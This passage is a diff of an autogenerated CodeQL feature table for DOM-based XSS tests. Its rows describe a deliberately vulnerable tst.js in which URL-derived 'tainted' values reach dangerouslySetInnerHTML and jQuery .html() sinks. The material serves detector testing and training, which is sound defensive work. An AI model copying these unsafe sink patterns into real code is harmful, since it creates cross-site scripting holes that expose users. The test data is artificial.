dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:213:39:213:46 | tainted2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:213:39:213:46 | tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | $('myId ... inted3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | $('myId ... inted3) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | $('myId ... inted3) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | $('myId ... inted3) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | $('myId ... inted3) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | exceptional return of $('myId ... inted3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | exceptional return of $('myId ... inted3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | exceptional return of $('myId ... inted3) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | exceptional return of $('myId ... inted3) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:13:214:47 | exceptional return of $('myId ... inted3) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16923,6 +117215,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:214:15:214:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:23:214:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:23:214:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:23:214:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:23:214:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:23:214:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:37 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:37 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:37 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:37 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:28:214:37 | this.state | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16930,6 +117237,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:214:28:214:46 | this.state.tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:33:214:37 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:33:214:37 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:33:214:37 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:33:214:37 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:33:214:37 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:214:39:214:46 | tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:214:39:214:46 | tainted3 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:214:39:214:46 | tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:214:39:214:46 | tainted3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:214:39:214:46 | tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:215:13:215:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 